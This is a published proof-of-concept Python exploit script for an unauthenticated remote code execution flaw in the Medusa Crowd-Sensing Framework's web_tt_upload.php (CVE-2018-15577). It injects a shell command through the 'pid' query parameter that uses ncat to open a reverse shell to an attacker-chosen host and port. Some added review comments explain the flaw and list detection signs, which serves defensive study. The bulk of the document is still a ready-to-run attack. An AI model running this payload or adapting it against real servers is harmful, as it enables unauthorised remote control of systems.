Created
August 20, 2018 15:56
Unauthenticated RCE - Medusa Crowd-Sensing Framework (CVE-2018-15577)
#!/usr/bin/python | |
''' | |
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
# Date: 16/08/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-15577 - RESERVED | |
# Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
# Version: V1.0 | |
# Tested on: Ubuntu 16.04 / PHP 7.0.28 | |
''' | |
# NOTE(review): proof-of-concept script for the issue named in the header above.
# It uses Python 2 print statements, and the indentation of the two lines under
# the `if` below was lost when this listing was extracted.
import requests | |
import sys | |
import os | |
# Exactly three positional arguments are required (url, local_ip, local_port);
# otherwise the usage line is printed and the script exits with status 0.
if len(sys.argv) != 4: | |
print "[+] Usage : ./exploit.py url local_ip local_port" | |
sys.exit(0) | |
url = sys.argv[1] | |
ip = sys.argv[2] | |
port = sys.argv[3] | |
# The query string carries a URL-encoded shell pipe and command in the `pid`
# parameter and ends with %23 ('#').
# NOTE(review): the server-side code is not shown on this page; presumably
# web_tt_upload.php places `pid` into a shell command without validation --
# confirm against the vendor source.
# Defensive takeaways: accept only an integer/allow-listed `pid`, never pass
# request parameters to a shell unescaped, and require authentication on the
# upload endpoint.
payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port) | |
# Plain string concatenation: `url` is expected to already point at the script.
full_url = url + payload | |
# create a file with some junk data to send | |
os.system("echo 111 > /tmp/medusa-exploit.txt") | |
# Multipart form field name is 'uploadedfile'; the handle opened here is never
# closed explicitly.
files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")} | |
print "[+]Sending Payload , check your shell !" | |
# Detection note: on the wire this is a multipart POST whose `pid` query
# parameter contains shell metacharacters ('|', '%23'), which is what to search
# for in web-server access logs. An unexpected child process of the PHP worker
# and an outbound connection from the web host would be the expected
# host-level signals.
# No timeout is set and the response is not inspected.
requests.post(full_url, files=files) | |
# remove the created file | |
os.system("rm /tmp/medusa-exploit.txt") | |
print "[+]Temp file removed !" |